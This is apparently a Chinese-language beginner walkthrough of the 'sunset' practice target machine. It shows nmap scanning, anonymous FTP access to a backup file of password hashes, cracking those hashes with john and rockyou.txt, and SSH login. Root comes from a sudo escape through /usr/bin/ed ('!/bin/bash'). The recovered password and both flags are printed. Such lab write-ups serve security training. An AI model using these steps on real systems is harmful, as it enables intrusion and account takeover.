sunset靶机渗透,该靶机就是纯主机渗透,比较简单,适合新手练习
本垃圾现在转向工控安全领域继续学习,后续将推出团队或者个人的公众号,希望大家关注
靶机IP:192.168.56.101
信息收集
nmap全扫
nmap -sS -Pn -A -p- -n 192.168.56.101
image.png
就只有21和22两个端口服务开发,21的FTP还能匿名登录,上去看看
匿名登录FTP
ftp 192.168.56.101
anonymous
image.png
发现一个备份文件backup,down下来看看
image.png
CREDENTIALS:
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/
这些都是证书,直接上john解一下
john解
将上述的hash保存为sunset,直接一起john解
john sunset
john解了好久,干脆跑字典
john --wordlist=rockyou.txt sunset
image.png
最后密码为:cheer14
登录提权
ssh sunset@192.168.56.101
cheer14
image.png
登录上去后,发现了 user.txt
5b5b8e9b01ef27a1cc0a2d5fa87d7190
不知道什么东西,解不出啦
查看下权限
sudo -l
image.png
发现有root权限免密执行/usr/bin/ed,用来提权
提权
执行试试
sudo /usr/bin/ed
并没有什么
查看下可执行的二进制文件并没有什么发现
image.png
随手试了试
sudo /usr/bin/ed
!/bin/bash
image.png
直接拿到root权限
直接拿flag
image.png
25d7ce0ee3cbf71efbac61f85d0c14fe
靶机百度云下载
链接:https://pan.baidu.com/s/1fjlXw2JoSKRjBWcqhWQ11A
提取码:anr0
网友评论